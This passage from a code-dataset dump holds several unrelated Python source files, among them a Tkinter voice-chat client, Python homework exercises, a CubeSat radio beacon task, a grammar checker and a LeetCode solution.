self.controller.frames[Called].start_checking()\n break\n\n\n# receiving or making a call page\nclass Main(Frame):\n def __init__(self, master, controller):\n super().__init__(master)\n self.users = Listbox(self, fg='green', font=('Ariel', 12))\n self.target_name = Entry(self, font=('Ariel', 12))\n self.controller = controller\n self.set()\n self.set_users_list()\n\n def set(self):\n Label(self, text='Call to', font=('Ariel', 20), foreground='magenta').pack(side=TOP)\n self.target_name.pack()\n Button(self, text='Call', command=self.pre_call).pack()\n Label(self, text='Users', font=('Ariel', 18), foreground='blue').pack()\n self.users.pack()\n self.users.bind('<>', self.to_entry)\n self.bind('', self.pre_call)\n self.target_name.focus_set()\n\n # create list of users\n def set_users_list(self):\n self.users.delete(0, END)\n users = ask_server.user_lists()\n for user in users:\n if user != self.controller.username:\n self.users.insert(END, user)\n if self.users.size() < 10:\n self.users.configure(height=self.users.size())\n self.after(5000, self.set_users_list)\n\n # put a user in entry\n def to_entry(self, event=None):\n index = self.users.curselection()\n name = self.users.get(index)\n self.target_name.delete(0, END)\n self.target_name.insert(0, name)\n\n # checks if name valid, if so runs call\n def pre_call(self, event=None):\n target = self.target_name.get()\n self.target_name.delete(0, END)\n if len(target) > 2 and target != self.controller.username:\n if ask_server.is_user(target): # checks if the user exists\n self.controller.target = target\n self.controller.show_frame(Calling)\n self.controller.frames[Calling].call()\n else:\n pop_up_message(f\"sorry, the user '{target}' is not registered yet\")\n elif len(target) < 3:\n pop_up_message('sorry, the name is too short, at least 3 characters')\n else:\n pop_up_message(\"you can't call yourself\")\n\n\n# waiting for a call to be answered page\nclass Calling(Frame):\n ring = r\"..\\media\\calling_ring.wav\"\n\n def __init__(self, master, controller):\n super().__init__(master)\n self.controller = controller\n self.cancel = False\n self.label = Label(self, font=('Ariel', 20), foreground='magenta')\n self.label.pack()\n Button(self, text='Cancel Call', command=self.stop_calling).pack()\n\n def call(self):\n # print(f'calling {self.controller.target}')\n self.label['text'] = f'Calling {self.controller.target}...'\n Thread(target=self.calling, name='calling', daemon=True).start()\n\n # cancels call\n def stop_calling(self):\n ask_server.stop(self.controller.username, 'calling')\n self.cancel = True\n\n # checks if target agreed to chat\n def answer(self, timeout=1):\n max_time = time.time() + 60 * timeout # 1 minutes from now\n # check if 'calling' changed to 'call'\n PlaySound(Calling.ring, SND_LOOP + SND_ASYNC)\n while True:\n time.sleep(1)\n if self.cancel:\n result = 'canceled'\n # print(result)\n break\n if time.time() > max_time:\n result = 'timed_out'\n break\n if ask_server.is_in_chat(self.controller.username):\n result = 'accepted'\n break\n if not ask_server.not_rejected(self.controller.username, self.controller.target):\n result = 'rejected'\n break\n PlaySound(None, SND_PURGE)\n return result\n\n # calls and handle the call\n def calling(self):\n is_posted = ask_server.call(self.controller.username, self.controller.target)\n if is_posted:\n # print('call posted')\n result = self.answer(1)\n if result == 'accepted':\n # print('call accepted')\n self.controller.show_frame(Chat)\n self.controller.frames[Chat].start_chat()\n else:\n self.controller.show_frame(Main)\n if result == 'timed_out': # waited too long for response from the call target\n pop_up_message(\"call canceled, didn't receive answer in time\")\n # print(\"call canceled, didn't receive answer in time\")\n elif result == 'canceled':\n self.cancel = False\n elif result == 'rejected':\n pop_up_message(\"call rejected\")\n # print(\"call canceled\")\n\n else: # error, call already exists, handling\n # print('error')\n ask_server.stop(self.controller.username, 'calling')\n self.calling()\n\n\n# receiving a call page\nclass Called(Frame):\n ring = r\"..\\media\\called_ring.wav\"\n\n def __init__(self, parent, controller):\n super().__init__(parent)\n self.controller = controller\n\n self.text1 = Label(self, font=('Ariel', 20), foreground='magenta')\n self.text1.pack()\n self.bind('', self.yes)\n yes = Button(self, text='yes', command=self.yes)\n yes.focus_set()\n yes.pack()\n Button(self, text='no', command=self.no).pack()\n\n def start_checking(self):\n Thread(target=self.called, name='called', daemon=True).start()\n\n def called(self):\n # print(f'hi {self.controller.username}, waiting for a call')\n while True:\n if ask_server.look_for_call(self.controller.username):\n self.controller.show_frame(Called)\n user = ask_server.get_src_name(self.controller.username)\n self.controller.user_called = user\n # print(f'{user} called')\n self.text1['text'] = f'you got a call from {user}\\ndo you want to answer'\n PlaySound(Called.ring, SND_LOOP + SND_ASYNC)\n break\n if ask_server.is_in_chat(self.controller.username): # when calling and call was approved\n break\n time.sleep(1)\n\n def yes(self):\n PlaySound(None, SND_PURGE)\n successful = ask_server.accept(self.controller.user_called, self.controller.username)\n if successful == 'True':\n time.sleep(0.5)\n self.controller.show_frame(Chat)\n self.controller.frames[Chat].start_chat()\n else:\n pop_up_message('call was canceled')\n # print('call was canceled')\n ask_server.stop(self.controller.username, 'calling')\n self.controller.show_frame(Main)\n self.start_checking()\n\n def no(self):\n ### is this how i wanna handle that? the caller dont check if we canceled\n PlaySound(None, SND_PURGE)\n ask_server.stop(self.controller.username, 'calling')\n self.controller.show_frame(Main)\n self.start_checking()\n\n\n# front page of the app\nclass StartPage(Frame):\n def __init__(self, parent, controller):\n super().__init__(parent)\n background_label = Label(self, image=controller.sp_background)\n background_label.place(x=0, y=0, relwidth=1, relheight=1)\n Label(self, text='Welcome to VOICECHAT, please log in to continue',\n font=('Ariel', 18), foreground='orange').pack(padx=5, pady=5)\n Button(self, text='login', command=lambda: controller.show_frame(Login)).pack()\n Label(self, text='Not registered yet? Do it now',\n font=('Ariel', 15), foreground='blue').pack(padx=5, pady=5)\n Button(self, text='register', command=lambda: controller.show_frame(Register)).pack()\n\n\n# login page\nclass Login(Frame):\n def __init__(self, parent, controller):\n super().__init__(parent)\n self.controller = controller\n # Label(self, text='Login', font=('Ariel', 20), foreground='orange').grid()\n self.entry_name = Entry(self)\n self.entry_pas = Entry(self, show='*')\n name = Label(self, text='Name')\n pas = Label(self, text='Password')\n enter = Button(self, text='Enter', command=self.collect)\n self.bind('', self.collect)\n self.entry_name.focus_set()\n # grid & pack\n name.grid(row=0, sticky=E)\n pas.grid(row=1, sticky=E)\n self.entry_name.grid(row=0, column=1)\n self.entry_pas.grid(row=1, column=1)\n enter.grid()\n\n def enter(self, name, pas):\n is_connected = ask_server.login(name, pas)\n if is_connected:\n self.controller.username = name\n pop_up_message(f\"you're in, {name}\")\n self.controller.create_frames()\n self.controller.show_frame(Main)\n self.controller.frames[Called].start_checking()\n else:\n self.entry_name.delete(0, END)\n self.entry_pas.delete(0, END)\n pop_up_message(\"name or password is incorrect\")\n\n def collect(self):\n name = self.entry_name.get()\n pas = self.entry_pas.get()\n self.enter(name, pas)\n\n\n# register page\nclass Register(Frame):\n def __init__(self, parent, controller):\n super().__init__(parent)\n self.controller = controller\n # Label(self, text='Register', font=('Ariel', 20), foreground='blue').grid()\n self.entry_name = Entry(self)\n self.entry_password = Entry(self)\n name = Label(self, text='Name')\n pas = Label(self, text='Password')\n enter = Button(self, text='Register', command=self.handle)\n self.bind('', self.handle)\n self.entry_name.focus_set()\n\n # grid & pack\n name.grid(row=0, sticky=E)\n pas.grid(row=1, sticky=E)\n self.entry_name.grid(row=0, column=1)\n self.entry_password.grid(row=1, column=1)\n enter.grid()\n\n def handle(self, event=None):\n # acquire args\n name = self.entry_name.get()\n pas = self.entry_password.get()\n self.entry_name.delete(0, END)\n self.entry_password.delete(0, END)\n # checks if valid\n if len(name) < 3 or len(pas) < 3:\n pop_up_message('name and password must be at least 3 characters')\n # add to database unless name is already used\n else:\n success = ask_server.register(name, pas)\n if success:\n # pop_up_message('added to database')\n self.controller.frames[Login].enter(name, pas)\n else:\n pop_up_message('username already used')\n\n\nif __name__ == '__main__':\n app = App()\n app.mainloop()\n","sub_path":"client/master.py","file_name":"master.py","file_ext":"py","file_size_in_byte":13663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"345175235","text":"# 1.\t编写程序,将字典中的键与值互换。\nd={1:\"a\",2:\"b\"}\nd_new={}\nfor k,v in d.items():\n # 方式一\n # d_new[v]=k #对于key相同时,会覆盖原来的value\n\n # 方式二\n # d_new.setdefault(v,k) # 对于key相同时,不会覆盖原来的value\n\n # 方式三 update\n t={v:k}\n d_new.update(t) #对于key相同时,会覆盖原来的value\n\n#字典推导式-----得到新的字典\nprint({v:k for k,v in d.items()})\n\n\nprint(d_new)\n\n\n# 2.\t元组是否可以总是可以作为字典的键值?\n# 只有当元组的元素全部都是不可变类型的对象时,才能够作为字典的key\n# t=(1,2,[1])\n# x={t,\"aa\"}\n#\n# 3.\t去除列表中的重复元素\nli=[1,1,2,3,4,7,8,2,1,2]\nprint(li)\n\n#方式一:\n#将temp设置为空列表,遍历原来的li,将不在temp中的元素加入的temp中。\ntemp=[]\nfor x in li:\n if x not in temp:\n temp.append(x)\nprint(temp)\n\n# 方式二:\n# 设置temp空列表,遍历原来的li,从第一个元素开始(i),判断第二个元素(i+1)到最后一个元素,\n# 判断i个元素是否存在在 从i+1到最后一个元素\n# 如果存在,说明有重复,不是唯一的,所以不要\n# 如果不存在,说明是唯一,加入到temp\ntemp=[]\nfor index,i in enumerate(li):\n if i not in li[index+1:]:\n temp.append(i)\nprint(temp)\n\n# 方式三:\nprint(list(set(li)))\n\n#\n\n#\n# 4.\t现存任意两个字符串s1与s2,判断s1中的字符在s2中存在的个数\n# (重复的算1个,一条语句实现)\ns1=\"aabbccddkk\"\ns2=\"adluglkdjkb\"\nprint(len(set(s1)&set(s2)))\n\n\n#\n# 5.\t实现一个人力资源管理员工管理(员工编号+姓名)的程序。\ndef que5():\n info=\"\"\"功能:1入职,2离职,3修改,4查看所有员工信息,5搜索指定员工,6重置,7 退出。\"\"\"\n person={}\n #如果person已存在员工,那么num就取员工编号的最大值max(person)\n # 否则取1000000\n # 1000001 张三\n # 1000002 李四\n num=max(person) if person else 1000000\n while True:\n print(info)\n c=input(\"请输入您的选择:\")\n if c==\"1\":\n # id=input(\"请输入员工编号:\")\n num += 1\n if num in person:\n print(\"员工编号已存在\")\n continue\n name=input(\"请输入员工姓名:\")\n person[num]=name\n print(\"添加成功!\")\n elif c==\"2\":\n id=int(input(\"输入要离职的员工编号:\"))\n if id not in person:\n print(\"员工不存在\")\n continue\n person.pop(id)\n print(\"删除成功!\")\n elif c==\"3\":\n id = int(input(\"输入要修改的员工编号:\"))\n if id not in person:\n print(\"员工不存在\")\n continue\n name=input(\"员工的新名字:\")\n person[id]=name\n print(\"修改成功\")\n elif c==\"4\":\n if person:\n for k,v in person.items():\n print(k,v)\n else:\n print(\"暂时无员工信息\")\n elif c==\"5\":\n id = int(input(\"输入要修改的员工编号:\"))\n if id not in person:\n print(\"员工不存在\")\n continue\n print(id,person[id])\n elif c==\"6\":\n person.clear()\n elif c==\"7\":\n break\n else:\n print(\"输入有误!\")\n\n\n\n#\n#\n#\n# 6.\t验证集合与字典的copy方法。\n# 字典是浅拷贝\n# 集合无论深拷贝浅拷贝,拷贝之后的对象不再是之前的对象。\nd={1:\"a\",2:\"b\",3:[\"d\",\"f\"]}\nd1=d.copy()\nimport copy\nd2=copy.copy(d)\nd3=copy.deepcopy(d)\nprint(id(d),id(d1),id(2))\nd[1]=\"a_new\"\nd[3][0]=\"d_new\"\nprint(d)\nprint(d1)\nprint(d2)\nprint(d3)\n\ns={1,2,3}\ns1=s.copy()\ns2=copy.copy(s)\ns3=copy.deepcopy(s)\nprint(id(s),id(s1),id(s2),id(s3))\n#\n#\n# 7.\t详细说说tuple、list、dict的用法,它们的特点\n\"\"\"\ntuple:元组,固定长度不可变的顺序容器,访问效率很高,适合存储常量,\n 在函数定义和返回的时候,经常最为参数和返回值\nlist: 列表,可变类型存储类型,方法丰富。\ndict: 键值对,值和长度是可变的,适合存储的键值对。\n# id:[name,age,gender]\n# log={id:[operation,id,name,time]} 添加修改删除。\n\n\"\"\"\n\n# 8.\t请去除a字符串多次出现的字母,仅留最先出现的一个。\n# 例 ‘abcabbd’,经过去除后,输出 ‘abcd’\n# 先将字符串变成列表,再将列表转换成set(去重复)\na=\"adkfjadkljfdlskfj\"\nli=list(a)\nprint(li)\nset_list=list(set(li))\nprint(set_list)\n\n# 去重复之后再变回列表(为了调用sort),列表是无序\n#指定key,key按照字符串中每个元素的索引。\n#key指定排序的规则,将每个元素分别使用key指定函数,获取返回值,会使用返回值排序\nset_list.sort(key=a.index)\nprint(set_list)\n\n\n# 9.\t不使用for循环判断search字符串中的字母是否存在在a字符串中。\na=\"DJLKDFJSKboyLFDJKdjkdfjsdk\"\nsearch=\"boy1\"\nprint(set(a))\nprint(set(search))\na_set=set(a)\nsearch_set=set(search)\na_set.update(search_set)\nprint(len(a_set)==len(set(a)))\n\nprint(a_set.issuperset(search_set))\n#\n","sub_path":"python1808real/day7/day6homework.py","file_name":"day6homework.py","file_ext":"py","file_size_in_byte":5266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"351780948","text":"import os\n\nfrom ..utils import say, copy_template_to_file, get_project_name\nfrom ..utils.command import BaseCommand\n\n\nclass DeployCommand(BaseCommand):\n def handle(self, params):\n from rework import __version__\n if params == ['--init']:\n # template variables\n project = get_project_name()\n kwargs = {\n 'django_rework_version': __version__,\n 'project': project,\n }\n deploy_path = os.path.join(self.base_dir, 'deploy')\n\n copy_queues = [\n ('.deploy/nginx/project_prod.conf', deploy_path),\n ('.deploy/nginx/project_test.conf', deploy_path),\n ('.deploy/supervisor/supervisord.conf', deploy_path),\n ('.deploy/supervisor/project_prod.conf', deploy_path),\n ('.deploy/supervisor/project_test.conf', deploy_path),\n ]\n for q in copy_queues:\n copy_template_to_file(q[0], self.base_dir, **kwargs)\n\n say('Deploy files copied successfully')\n\n else:\n say('Unknown command args!')\n\n def __call__(self, params):\n return self.handle(params)\n","sub_path":"rework/core/management/deploy.py","file_name":"deploy.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"227625210","text":"import os\nimport evacsim\n\n# Instantiates a new EvacSim object, and parses the given cmdline arguments (or uses default if left blank).\n# Models are then loaded from provided arguments or defaults, and exported accordingly to .KML files.\nev = evacsim.EvacSim()\nev.parse_args(ev.init_args())\nev.load_models()\nev.generate_evacuation_routes()\nev.export_kml()\n\n# If 'run' arg is true, open exported KML file in Google Earth Pro\nif ev.args['run']:\n os.startfile('export.kml')\n\n# Example usage from the root directory:\n# python evacsim/run.py --nodes nodes.csv --edges edges.csv --disaster disaster.csv --dir models/troy_model/ --export export.kml\n# These arguments can be omitted to use the default values.\n","sub_path":"evacsim/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"144461757","text":"# Transmit \"Hello World\" beacon\n\nfrom Tasks.template_task import Task\nimport cdh\n\nANTENNA_ATTACHED = False\n\nclass task(Task):\n priority = 1\n frequency = 1/30 # once every 30s\n name='beacon'\n color = 'teal'\n\n schedule_later = True\n\n # our 4 byte code to authorize commands\n # pass-code for DEMO PURPOSES ONLY\n super_secret_code = b'p\\xba\\xb8C'\n\n cmd_dispatch = {\n 'no-op': cdh.noop,\n 'hreset': cdh.hreset,\n 'shutdown': cdh.shutdown,\n 'query': cdh.query,\n 'exec_cmd': cdh.exec_cmd,\n }\n\n def __init__(self,satellite):\n super().__init__(satellite)\n # set our radiohead node ID so we can get ACKs\n self.cubesat.radio1.node = 0xFA # our ID\n self.cubesat.radio1.destination = 0xAB # target's ID\n\n async def main_task(self):\n \"\"\"\n If you've attached a 433MHz antenna,\n set the above ANTENNA_ATTACHED variable to True\n to actually send the beacon packet\n \"\"\"\n if ANTENNA_ATTACHED:\n self.debug(\"Sending beacon\")\n self.cubesat.radio1.send(\"Hello World!\",destination=0xFF,keep_listening=True)\n else:\n # Fake beacon since we don't know if an antenna is attached\n print() # blank line\n self.debug(\"[WARNING]\")\n self.debug(\"NOT sending beacon (unknown antenna state)\",2)\n self.debug(\"If you've attached an antenna, edit '/Tasks/beacon_task.py' to actually beacon\", 2)\n print() # blank line\n self.cubesat.radio1.listen()\n\n self.debug(\"Listening 10s for response (non-blocking)\")\n heard_something = await self.cubesat.radio1.await_rx(timeout=10)\n\n if heard_something:\n # retrieve response but don't ACK back unless an antenna is attached\n response = self.cubesat.radio1.receive(keep_listening=True,with_ack=ANTENNA_ATTACHED)\n if response is not None:\n self.debug(\"packet received\")\n self.debug('msg: {}, RSSI: {}'.format(response,self.cubesat.radio1.last_rssi-137),2)\n self.cubesat.c_gs_resp+=1\n\n \"\"\"\n ########### ADVANCED ###########\n Over-the-air commands\n See beep-sat guide for more details\n \"\"\"\n if len(response) >= 6:\n if not ANTENNA_ATTACHED:\n self.debug('Antenna not attached. Skipping over-the-air command handling')\n else:\n if response[:4]==self.super_secret_code:\n cmd=bytes(response[4:6]) # [pass-code(4 bytes)] [cmd 2 bytes] [args]\n cmd_args=None\n if len(response) > 6:\n self.debug('command with args',2)\n try:\n cmd_args=response[6:] # arguments are everything after\n self.debug('cmd args: {}'.format(cmd_args),2)\n except Exception as e:\n self.debug('arg decoding error: {}'.format(e),2)\n if cmd in cdh.commands:\n try:\n if cmd_args is None:\n self.debug('running {} (no args)'.format(cdh.commands[cmd]))\n self.cmd_dispatch[cdh.commands[cmd]](self)\n else:\n self.debug('running {} (with args: {})'.format(cdh.commands[cmd],cmd_args))\n self.cmd_dispatch[cdh.commands[cmd]](self,cmd_args)\n except Exception as e:\n self.debug('something went wrong: {}'.format(e))\n self.cubesat.radio1.send(str(e).encode())\n else:\n self.debug('invalid command!')\n self.cubesat.radio1.send(b'invalid cmd'+response[4:])\n else:\n self.debug('no messages')\n self.cubesat.radio1.sleep()\n self.debug('finished')\n\n\n","sub_path":"advanced/Tasks/beacon_task.py","file_name":"beacon_task.py","file_ext":"py","file_size_in_byte":4313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"193313302","text":"import argparse\nfrom train import train\n#from evaluate import evaluate\nfrom validate import validate\n\ndef get_options():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-e\",\"--epochs\",type=int,dest=\"epochs\",help=\"number of epochs\",default=100)\n parser.add_argument(\"-lr\",type=float,dest=\"lr\",help=\"learning rate\",default=0.001)\n #parser.add_argument(\"-d\",\"--decay\",type=float,dest=\"decay\",help=\"weight decay\",default=0.005)\n #parser.add_argument(\"-m\",\"--momentum\",type=float,dest=\"momentum\",help=\"learning momentum\",default=0.9)\n parser.add_argument(\"-n\",\"--n_class\", type=int, dest=\"n_class\", help=\"number of segments\", default=1)\n parser.add_argument(\"-i\",\"--in_channel\", type=int, dest=\"in_channel\", help=\"number of input channels\", default=1)\n parser.add_argument(\"--display\", action = 'store_true')\n parser.add_argument(\"--save\", action = 'store_true')\n parser.add_argument(\"--save-file\", dest=\"save_file\", default=None)\n parser.add_argument(\"--load\", action = 'store_true')\n parser.add_argument(\"--load-file\", dest=\"load_file\", default=None)\n parser.add_argument(\"--eval\", action = 'store_true')\n parser.add_argument(\"--validate\", action = 'store_true')\n parser.add_argument(\"--directory\", dest=\"directory\", help=\"directory where training data is stored\", default='../Data/train/')\n parser.add_argument(\"--loss\", dest=\"loss\", help=\"choose loss function\", default='BCE')\n parser.add_argument(\"--image-size\", type=int, dest=\"img_size\", help=\"choose input image size\", default=None)\n parser.add_argument(\"--dataset-size\", type=int, dest=\"data_size\", help=\"number of images in an epoch\", default=None)\n args = parser.parse_args()\n if args.validate:\n validate(args.lr, args.n_class, args.in_channel, args.loss, args.display, directory=args.directory, img_size=args.img_size, data_size=args.data_size, load_file=args.load_file)\n else:\n train(args.epochs, args.lr, args.n_class, args.in_channel, args.loss, args.display, save=args.save, load=args.load, directory=args.directory, img_size=args.img_size, data_size=args.data_size, load_file=args.load_file, save_file=args.save_file)\n #if args.eval:\n # evaluate()\n #elif args.validate:\n # validate(args.display)\n #else:\n # train(args.epochs, args.lr, args.n_class, args.in_channel, args.display, save=args.save, load=args.load)\n\nget_options()\n","sub_path":"Code/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"648563516","text":"#!/usr/bin/python\n\nimport re\nimport logging\nfrom common import *\n\n\ndef check_line_for_unwanted_patterns(file_name, line, line_number):\n\n reg_exsps = [\n (\"pick up\",\"pick\", []),\n (\"which leads\",\"leads\", []),\n (\"are then\",\"are\", []),\n\n (\"[N|n]etwork state\",\"network's state\", []),\n (\"[N|n]etwork condit\",\"network's\", []),\n (\"[N|n]etwork utili\",\"network's\", []),\n\n\n\n # (\"network+[ ]+[\\w]+[ ]+state\",\"network's state\", []),\n\n (\"strong and weak\",\"advantages and disadvantages\", []),\n (\"one hand side\",\"one side\", []),\n (\"consider a \",\"considering\", []),\n (\"Consider a \",\"considering\", []),\n\n (\"[L|l]atency delay class \",\"latency class\", []),\n\n\n # (\"Consider a \",\"considering\", []),\n\n\n (\"not clear\",\"unclear\", []),\n (\"not sufficient\",\"insufficient\", []),\n (\"not necessary\",\"unnecessary\", []),\n (\"than it is\",\"than is\", []),\n (\"dependent on\",\"depends on\", []),\n\n (\"from a target\",\"of a target\", []),\n (\"from the target\",\"of the target\", []),\n (\"look into\",\"investigate\", []),\n (\"on Figure\",\"in Figure\", []),\n (\"at the times when\",\"when\", []),\n\n (\"significant\",\"perhaps large?\", []),\n\n (\"higher is the\",\"higher the\", []),\n (\"lower is the\",\"lower the\", []),\n (\"greater is the\",\"greater the\", []),\n (\"a lot of\",\"many\", []),\n (\"when exactly\",\"exactly when\", []),\n (\"can expect\",\"expect\", []),\n (\"has been defined\",\"defined\", []),\n (\"tells us\", \"states\", []),\n (\"erformance over\", \"performance on\", []),\n (\"[s] has\", \"have\", []),\n (\"real time\", \"real-time\", []),\n (\"[B|b]ack end\",\"back-end\", []),\n (\" [R|r]e[ |~|-]*eval\",\" \\mbox{re-evaluate} non separatable dash\", []),\n\n # (\" a [a-zA-Z]+[s]+[ \\.\\,;:]+\", \"Remove article?\", [\" a weakness \"]),\n # (\" a [a-zA-Z]+[ ]+[a-zA-Z]+[s]+[ \\.\\,;:]+\", \"Remove article?\", []),\n (\"this [\\w]+[s]+[^\\w]\", \"Use these?\", [\"this is \", \"this suggests \", \"this differs \", \"this was \"]),\n # (\"significantly\", \"a lot ?\"),\n\n # (\"[0-9]+[ ~]+hours\", \"x-hour\", []),\n (\"[0-9]+[ ]+(ms|sec|min|hour|Hz)\", \"use ~ between number and a measurement\", []),\n\n (\"[T|t]o be able to\", \"simply: to\", []),\n\n (\"minimal\", \"minimum\", []),\n\n\n # DASHED WORDS\n\n (\"non intuitive\", \"non-intuitive\", []),\n (\"[O|o]ne way\", \"one-way\", []),\n\n # WORD ORDERING\n\n (\" only used\", \"used only\", []),\n (\" only with\", \"with only\", []),\n (\"the only\", \"only the\", []),\n\n # This as example demonstrates ==> As this example demonstrates\n (\"this as\", \"as this\", []),\n\n # Alternative Suggestions\n (\"enough\", \"perhaps: sufficient/insufficient?\", []),\n (\" pace\", \"perhaps: rate?\", []),\n (\"[D|d]epend on\", \"perhaps: depend upon\", []),\n (\"[D|d]epends on\", \"perhaps: depends upon\", []),\n\n\n\n\n (\"axes\", \"axis?, ex: The X axis, Many axes\", []),\n\n\n (\"[T|t]hen\", \"consider synonym: Subsequently\", []),\n\n (\"[O|o]rder at which\", \"order IN which\", []),\n (\"only from\", \"of only\", []),\n\n (\"desire to provide\", \"perhaps: want to achieve ?\", []),\n\n (\"[A|a]s a result\", \"perhaps: thus ?\", []),\n\n (\"[W|w]ith accordance\", \"perhaps: in accordance ?\", []),\n (\"accordance to\", \"perhaps: accordance with?\", []),\n\n (\"[N|n]ot possible\", \"perhaps: impossible?\", []),\n\n\n (\"[K|k]ernel level\", \"perhaps: kernel space?\", []),\n (\"[U|u]ser level\", \"perhaps: user space?\", []),\n\n\n (\"guarantee\", \"perhaps: ensure?\", []),\n\n (\"[V|v]iew into\", \"perhaps: view of?\", []),\n\n (\"Cassandra's requests\", \"Cassandra requests\", []),\n\n (\"[A|a]pplication's requests\", \"application requests\", []),\n\n (\"the interference\", \"interference\", []),\n\n (\"performed frequently\", \"frequently performed\", []),\n\n (\"improving the performance\", \"no _the_\", []),\n\n (\"with regard to\", \"avoid, potentially: while taking advantage of....\"),\n\n (\"not able\", \"unable\", []),\n (\"in the multiple\", \"multiples\", []),\n\n (\"not active\", \"inactive\", []),\n\n (\"according to\", \"as described in\", []),\n (\"not practical\", \"impractical\", []),\n\n (\"clients threads\", \"client threads\", []),\n\n (\"need only\", \"only need\", []),\n\n\n\n\n\n ]\n\n\n for exp in reg_exsps:\n p = re.compile(exp[0])\n m = p.search(line)\n if m and m.group() not in exp[2]:\n left_index,_ = m.span()\n print_warning(\n file_name, line_number, line, m.group(),\n left_index, message=\" (use: %s ?)\"%(exp[1])\n )\n\n ##########################################\n # Complex Checks\n ##########################################\n\n\n p = re.compile(\" a [a-zA-Z]+[s]+[ \\.\\,;:]+\")\n m = p.search(line)\n if m:\n left_index,_ = m.span()\n word = fix_spaces(m.group()).split(\" \")[-1]\n if word in NOUNS and is_plural(word):\n print_warning(file_name, line_number, line, m.group(),\n left_index, message=\" (use: Remove article?)\")\n else:\n logging.debug(\"Ignoring case: %s \" % (m.group()))\n\n # Example: a large numbers\n match, left_indx, _ = match_reg(line, \" a [a-zA-Z]+[ ]+[a-zA-Z]+[s]+[ \\.\\,;:]+\")\n if match:\n tokens = fix_spaces(match).split(\" \")\n word = tokens[-1]\n if word in NOUNS and is_plural(word):\n print_warning(file_name, line_number, line, match,\n left_indx, message=\" (use: Remove article(2)?)\")\n else:\n logging.debug(\"Ignoring case: %s \" % match)\n\n\n # [x, y, and z] comma case, check x, y are nouns\n p = re.compile(\"[a-zA-Z]+, [a-zA-Z]+ (and).\")\n m = p.search(line)\n if m:\n substr = m.group()\n substr.translate(None, \",\")\n\n word_x = m.group().split(\" \")[0]\n word_y = m.group().split(\" \")[1]\n\n if word_x in NOUNS and word_y in NOUNS:\n left_index,_ = m.span()\n print_warning(file_name, line_number, line, m.group(),\n left_index, message=\" (use: x, y, and z?)\")\n else:\n logging.debug(\"Ignoring case: %s \" % (m.group()))","sub_path":"Phase_2/pytools-master/spycheck/checkgrammar.py","file_name":"checkgrammar.py","file_ext":"py","file_size_in_byte":5955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"48488941","text":"#\n# @lc app=leetcode.cn id=127 lang=python3\n#\n# [127] 单词接龙\n#\n\n# @lc code=start\nclass Solution:\n import collections\n def ladderLength(self, beginWord: str, endWord: str, wordList: List[str]) -> int:\n LUT = collections.defaultdict(list)\n L = len(endWord)\n for word in wordList:\n for i in range(L):\n LUT[word[:i] + '*' + word[i + 1:]].append(word)\n queue = collections.deque()\n queue.append((beginWord, 1))\n\n visited = set()\n visited.add(beginWord)\n while queue:\n node, step = queue.popleft()\n if node == endWord:\n return step\n for i in range(L):\n new = node[:i] + '*' + node[i + 1:]\n for word in LUT[new]:\n if word not in visited:\n visited.add(word)\n queue.append((word, step + 1))\n return 0\n# @lc code=end\n\n","sub_path":"Week04/127.单词接龙.py","file_name":"127.单词接龙.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"613394575","text":"#!python3\n# -*- coding: utf-8 -*-\nfrom __future__ import print_function\nimport os, sys\nimport codecs\nimport glob\nimport json\nimport re\n\nINPUT_ENCODING = \"utf-8-sig\"\nOUTPUT_ENCODING = \"utf-8\"\n\ndef parse_text(text):\n \"\"\"Scan the input file one line at a time, looking for a keyword\n at the start of the line which will be one word in capital letters\n followed by a colon. This introduces a text suite, possibly over several\n lines which lasts until the next keyword or the end of the text.\n\n Lines which start with a hash sign (#) are treated as comments\n and are ignored.\n \"\"\"\n keyword_matcher = re.compile(r\"([A-Z]+)\\:\\s*(.*)\", flags=re.UNICODE)\n\n #\n # The text consists of a number of blocks, introduced by a keyword\n # and containing one or more paragraphs. This parser yields the keyword\n # and a list of the paragraphs. For some keywords, this list will always\n # contain exactly one string.\n #\n keyword = None\n paragraphs = []\n for line in text.splitlines():\n if line.startswith(\"#\"):\n continue\n match = keyword_matcher.match(line)\n if match:\n if keyword:\n yield keyword, paragraphs\n keyword, text = match.groups()\n paragraphs = [text.strip()]\n else:\n paragraphs.append(line.strip())\n\n #\n # If we fall out of the loop with a keyword & text\n # remaining (which is the most likely case) then yield\n # both\n #\n if keyword and paragraphs:\n yield keyword, paragraphs\n\ndef process_title(texts):\n \"\"\"Take a title with an optional subtitle in brackets and\n yield both as TITLE / SUBTITLE\n \"\"\"\n text = \" \".join(texts)\n #\n # Match as many non-left-bracket characters as possible\n # Then, optionally, match text in brackets\n #\n title, subtitle = re.match(r\"([^(]+)\\s*(?:\\(([^)]+)\\))?\", text, flags=re.UNICODE).groups()\n yield \"TITLE\", title\n yield \"SUBTITLE\", subtitle\n\ndef process_gospel(texts):\n \"\"\"Take a gospel quote prefixed by a chapter-and-verse reference.\n NB The chapter-and-verse must be on the same line as the \"GOSPEL:\"\n tag but the quote must be on a new line -- this makes it easier\n (read: possible) to parse the messy citations you can get.\n \"\"\"\n text = \"%s\\n%s\" % (texts[0], \" \".join(texts[1:]))\n citation, gospel = re.match(r\"([^\\n]+)\\n(.*)\", text, flags=re.UNICODE).groups()\n yield \"CITATION\", citation\n yield \"GOSPEL\", gospel\n\nstyle_markers = {\n \"_\" : \"italic\",\n \"*\" : \"bold\",\n \"@\" : \"boldItalic\"\n}\ndef process_paragraph(paragraph):\n \"\"\"Generate tuples of (style, text) where the default\n style is normal, and an underscore introduces an italic style\n and an asterisk introduces a bold style.\n \"\"\"\n state = \"normal\"\n 